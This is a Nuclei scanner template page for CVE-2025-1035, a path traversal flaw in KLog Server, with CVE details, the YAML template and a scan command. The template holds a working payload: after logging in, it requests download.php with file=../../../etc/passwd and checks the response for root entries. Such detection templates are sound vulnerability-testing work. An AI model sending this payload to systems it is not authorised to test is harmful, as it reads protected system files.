Skip to content
Nuclei Templates

KLog Server - Path Traversal

ID: CVE-2025-1035

Severity: medium

Author: s4e-io

Tags: cve,cve2025,klog-server,lfi

Description

Section titled “Description”

Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.

YAML Source

Section titled “YAML Source”
id: CVE-2025-1035


info:
  name: KLog Server - Path Traversal
  author: s4e-io
  severity: medium
  description: |
    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
  reference:
    - https://www.byresearchers.net/2025/02/cve-2025-1035-klog-server-31.html
    - https://www.usom.gov.tr/bildirim/tr-25-0037
    - https://www.cve.org/CVERecord?id=CVE-2025-1035
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.7
    cve-id: CVE-2025-1035
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 2
    vendor: klogserver
    product: klog_server
  tags: cve,cve2025,klog-server,lfi


variables:
  filename: "{{to_lower(rand_text_alpha(6))}}"


http:
  - raw:
      - |
        POST /actions/entree.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        user={{username}}&pswd={{password}}&action=login


      - |
        GET /actions/download.php?action=web&file=../../../etc/passwd&name={{filename}}.zip HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    max-redirects: 3


    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body_2)"
          - 'contains_all(header_2, "application/octet-stream", "filename=")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a00473045022100ae40ef4ce51bb3b7b9007094b44028ea3bfe30bee84b15cf567bf65c69822d1d0220656d60d70470d7a90e7ecb2fc2b5a5ade155a5bf908fd04256b2ef522c035fa2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-1035.yaml"

View on Github